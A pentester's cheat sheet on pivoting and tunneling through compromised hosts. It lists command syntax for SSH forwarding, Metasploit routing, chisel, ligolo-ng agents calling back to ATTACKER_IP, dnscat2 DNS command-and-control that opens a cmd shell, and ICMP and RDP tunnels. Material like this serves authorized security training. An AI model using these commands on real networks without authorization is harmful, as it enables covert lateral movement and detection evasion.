Pivoting & Tunneling

Pivoting is moving to other networks through a compromised host to find multiple targets on different network segments and Tunneling is the obfuscation of our actions to avoid detection.

SSH

client: Where the ssh command is executed. server: Target of the ssh connection.

Allows a local client port to be mapped to another port on a certain target reachable by the server.

ssh -N -L <C_PORT>:<S_TRAGET_IP>:<S_TARGET_PORT> <S_USER>@<S_IP>

(possible to repeat multiple times -L for multiple ports)

Allows a local client port to be mapped to the server. That port will be used as a proxy socks, so packets passing through that port will leave from the server.

ssh -N -D <C_PORT> <S_USER>@<S_IP>

vim /etc/proxychains[4].conf
# socks4 127.0.0.1 <C_PORT>

sudo proxychains[4] <COMMAND>

(ex.. nmap, msfconsole)

Allows a port on the server to be mapped to another port on a target reachable by the client.

ssh -N -R <S_PORT>:<C_TRAGET_IP>:<C_TARGET_PORT> <S_USER>@<S_IP>

Allows a server port to be mapped to the client. That port will be used as a proxy socks, so packets passing through that port will leave from the client.

ssh -N -R <S_PORT> <S_USER>@<S_IP>

-N: Without the ability to execute remote commands. 0.0.0.0: All interface.

Metasploit

Pivoting only inside metasploit. Maps reaching other subnets via meterpreter sessions (via victim hosts).

 post/multi/manage/autoroute  # set network and session

route add <NETWORK> <SESSION>

Or, in Meterpreter:

run autoroute -s <NETWORK>

Pivoting for tools outside metasploit. Allows a local port to be mapped to metasploit. That port will be used as a proxy socks, so packets passing through that port will be handled by the route paths defined in metasploit.

# Set Route

auxiliary/server/socks_proxy   # set vSocks 4a or 5 and PORT

vim etc/proxychains[4].conf
# socks4 127.0.0.1 <PORT>

sudo proxychains[4] <COMMAND>

(ex. nmap)

In meterpreter you can define both a Local and a Remote port forwarding (see above ssh).

Local

portfwd add -l <C_PORT> -p <S_TARGET_PORT> -r <S_TRAGET_IP>

Remote

portfwd add -R -l <C_TARGET_PORT> -p <S_PORT> -L <C_TRAGET_IP>

Other

Simple Port Forwarding (single-host)

Define the listening port and the destination to rebroadcast to.

socat TCP4-LISTEN:<PORT>,fork TCP4:<TARGET_IP>:<TARGET_PORT>

Define the listening port and the destination to rebroadcast to. Requires administrator privileges.

netsh.exe interface portproxy add v4tov4 listenport=<S_PORT> listenaddress=0.0.0.0 connectport=<TARGET_PORT> connectaddress=<TARGET_IP>

To view

netsh.exe interface portproxy show v4tov4

sshutle

It allows you to define on the local machine routes to certain subnets reachable from a host, via an ssh tunnel to that host. It therefore eliminates the need to configure proxychains.

sudo sshuttle -r <USER>@<IP>:<PORT_SSH> <NETWORK>

<COMMAND_TO_NETWORK>

NO proxychains, but root on the SSH client and Python3 on the SSH server.

Plink

On Windows before OpenSSH, PuTTY and its command-line-only counterpart Plink were used. Plink has much of the functionality offered by ssh.

plink.exe -ssh -R <PORT>:<IP>:<PORT> <USER>@<IP>

plink.exe -ssh -D 9050 <USER>@<IP>

Download Proxifier, portable version (like proxychains but for windows).

Set new proxy server socks5 to 127.0.0.1:9050

<COMMAND>

If we cannot interact with the running shell:

-pw # specify password from command

cmd.exe /c echo y | plink.exe -ssh ... # via piping

Tunneling

ligolo-ng

apt install ligolo-ng

Proxy on Attacker machine. Agent on Victim machine.

sudo ./proxy -selfcert
# See ATTACKER_IP ATTACKER_PORT
# > help

Connect the victim to the server

> sessions
> autoroute

Ligolo-ng < v0.6

sudo ./proxy -selfcert [-laddr <MY_IP>:<MY_PORT>]
# See ATTACKER_IP ATTACKER_PORT
# > help

Create a tun interface on the Proxy Server (C2)

sudo ip tuntap add user <your_username> mode tun ligolo
sudo ip link set ligolo up

Connect the victim to the server and select the session

> sessions
> <ID>
> ifconfig

Setup routing

sudo ip route add <ROUTE/MASK> dev ligolo

> start [--tun <NAME_TUN>]
> stop

Ligolo-ng >= v0.6

sudo ./proxy -selfcert
# See ATTACKER_IP ATTACKER_PORT
# > help

Create a tun interface on the Proxy Server (C2)

> interface_create --name "<NAME>"

Connect the victim to the server and select the session

> sessions
> <ID>
> ifconfig

Start the tunneling

> tunnel_start --tun <NAME>

Setup routing

> interface_add_route --name <NAME> --route <ROUTE/MASK>

Connect to the attacker server

./agent.exe -connect <ATTACKER_IP>:<ATTACKER_PORT> -ignore-cert

PROXY --> AGENT1 --> AGENT2 --> ?

You can listen to ports on the agent and redirect connections to your control/proxy server.

listener_add --addr <AGENT_IP>:<AGENT_PORT> --to <PROXY_IP>:<PROXY_PORT> --tcp

> listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp

Useful when we need to set up a reverse shell or something else from the second target (AGENT2) in the network that is not directly reachable.

If we want to do another pivoting from the second target machine (AGENT2), we just need to load the agent, reconnect to the proxy server via the set listener, set new tun (ex. ligolo2) and add routing (see here).

Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent. When using nmap, you should use --unprivileged or -PE to avoid false positives.

chisel

It performs TCP/UDP pivoting and tunneling, transported over HTTP and encrypted internally via SSH. Being hidden under HTTP it can bypass some restrictions.

On Attacker

chisel server -p <PORT> --reverse --socks5

On Target

chisel client <SERVER_IP:PORT> <REMOTE> [<REMOTE>]

<REMOTE>:

<C_IP>:<C_PORT>:<S_TARGET_IP>:<S_TARGET_PORT>

R:<S_IP>:<S_PORT>:<C_TARGET_IP>:<C_TARGET_PORT>

[R:]<PORT>:<PORT>

[R:]<PORT>:socks

Add the port in proxychains

vim /etc/proxychains[4].conf
socks5 127.0.0.1 <PORT>

proxychains[4] <COMMAND>

dnscat2

DNS-based encrypted command-and-control channel. A dnscat2 server runs on an authoritative name server for a particular domain (or as in our case a dummy dns server is created) while the client, configured to run queries on that domain, runs on the compromised machine.

On Attacker (Server)

sudo apt install dnscat2

sudo dnscat2-server --dns host=<IP>,port=53,domain=<DOMAIN>
# Memorize secret <SECRET>

On Target (Client)

Download compiled from HERE

./dnscat --dns server=<IP>,port=53,domain=<DOMAIN> --secret=<SECRET>

Or with Windows PowerShell Script

Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver <IP> -Domain <DOMAIN> -PreSharedSecret <SECRET> -Exec cmd

Once connected, from Attacker

?     
<COMMAND> --help
windows         # see connections ID
window -i <ID>  # shell

ptunnel-ng

Communication channel encapsulated in ICMP packets. Requires administrator privileges.

Installation

.exe for Windows HERE

git clone https://github.com/utoni/ptunnel-ng.git && cd ptunnel-ng
sudo ./autogen.sh
cd src

On Target (Server)

sudo ./ptunnel-ng -r<SERVER_IP> -R22

On Attacker (Client)

sudo ./ptunnel-ng -p<SERVER_IP> -l2222 -r<SERVER_IP> -R22

ssh -p2222 -l<USER> <IP>

ssh -D 9050 -p2222 -l<USER> 127.0.0.1

vim /etc/proxychains[4].conf
# socks4 127.0.0.1 9050

sudo proxychains[4] <COMMAND> 
sudo proxychains[4] nmap <TARGET_IP_FROM_SERVER>

SocksOverRDP

Allows tunnelling and pivoting between Windows systems via RDP. Requires administrator privileges.

On Attacker (Client), with System PowerShell

regsvr32.exe SocksOverRDP-Plugin.dll

mstsc.exe # Connect on target1

Download Proxifier, portable version (like proxychains but for windows).

Set new proxy server socks5 to 127.0.0.1:1080

On Target1, with System PowerShell

SocksOverRDP-Server.exe

On Attacker

mstsc.exe # Connect on target1 via Target1 pivoting

Warning

With proxychains only full TCP connect scan (nmap -sT)
Windows Defender blocks ICMP, traditional ping (nmap -Pn)

Last updated 7 months ago

Was this helpful?